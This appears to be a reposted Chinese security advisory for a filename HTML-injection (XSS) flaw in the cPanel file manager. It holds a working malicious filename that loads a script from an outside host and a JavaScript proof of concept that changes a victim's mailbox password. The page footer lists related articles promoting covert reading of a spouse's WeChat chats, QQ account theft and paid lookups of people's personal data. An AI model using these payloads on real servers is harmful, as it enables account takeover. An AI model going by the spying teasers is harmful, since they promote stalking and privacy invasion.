cPanel文件管理器文件名HTML注入漏洞
影响版本:
cPanel 11.24.4-CURRENT
漏洞描述:
BUGTRAQ ID: 34142
cPanel是基于web的工具,用于自动化控制网站和服务器。
Cpanel内嵌有两个文件管理器,分别为标准和旧式文件管理器。这两个文件管理器在处理文件名时存在跨站脚本漏洞,远程攻击者可以通过创建特制的文件名注入并执行脚本。
对于旧式文件管理器,只要查看了文件列表就可以执行攻击者的代码;对于标准文件管理器,文件列表经过转义,但如果用户对恶意文件执行了删除、拷贝、移动、重新命名等任务的话,仍可能执行注入的脚本。
由于文件名中禁用斜线字符,因此攻击者无法直接使用<script>标签加载脚本。为了摆脱这个限制,攻击者可以通过<img>标签onError属性注入脚本并将src属性设置为空字符串来强制触发出错事件。通过<img>标签注入的脚本生成<script>标签,使用document.write()函数执行外部脚本。 <*参考
Rizki Wicaksono (rizki.wicaksono@gmail.com)
http://marc.info/?l=bugtraq&m=123730614528241&w=2.
*>
SEBUG安全建议:
厂商补丁:
cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cpanel.net.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
恶意文件名:
<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>
该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:
<script src=http://ilmuhacking.com/x.js></script>
PoC负载:
----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
try {
http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
} catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
alert(result);
} else {
alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
+
\"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
\"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);
相关文章
在自己手机上看老婆跟谁聊天(怎样偷偷接收老婆的微信聊天)_微信聊天
在自己手机上看老婆跟谁聊天(怎样偷偷接收老婆的微信聊天),婆媳疑问是中国5000年来连续没有办理的永久疑问。我在媳妇和母亲之间摆布尴尬,但也为此蒙受了充足的难受。当我不当心翻开媳妇的手机时,我认识到媳...
女孩购1吨洋葱送前男友:为何跟作精分手最难熬?_疫情
洋葱可防新冠病毒,洋葱可以壮阳补肾,不错不错。 这活脱脱的狗血剧,楼主也来蹭热度,作为原创作者,吃饱了撑的! 这不属于寻衅滋事吗? 这女孩是真爱,遇到渣男也太不幸了赞 | 回复 | 引用 | 举报回帖...
黑客教你查询某人信息(200元查个人信息靠谱吗)_黑客教你查询某人信息
这三个标志出现在手机上。黑客可能会追捕你。网友:我们该怎么办?众所周知,在互联网时代,人们确实需要更加重视网络安全。如果个人信息和隐私泄露会导致财产安全问题,那么后果不堪设想。黑客教你查询他人信息(2...
黑客教你一分钟盗号,WordPress黑客攻击近100万个网站_WordPress
Facebook再曝隐私问题:150多万用户数据被公开在亚马逊云服务器上,Facebook周三显露,自2016年5月以来,该公司大概“不测上传”了150万名新用户的电子邮件接洽人,这宛若是社群媒体巨擘...
黑客一分钟如何盗取QQ? 看看就知道了_黑客
黑客一分钟如何盗取QQ? 每年,都会有很多人由于QQ密码而损失惨重,但仍然摆脱不了对懒惰的寻求。 以著名程序员网站csdn走漏的600万个明文密码为例,运用“1234567890”、“12345...
用自己手机查老婆和别人聊天
互联网的快速发展更新使得人与人之间最基础的信任都变得可笑,微信作为一个聊天的使用广泛的软件,不免会出现想要查找聊天记录的情况,那么如何才能用自己的手机查到老婆和别人的聊天记录呢? 用自己手机查老婆和...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!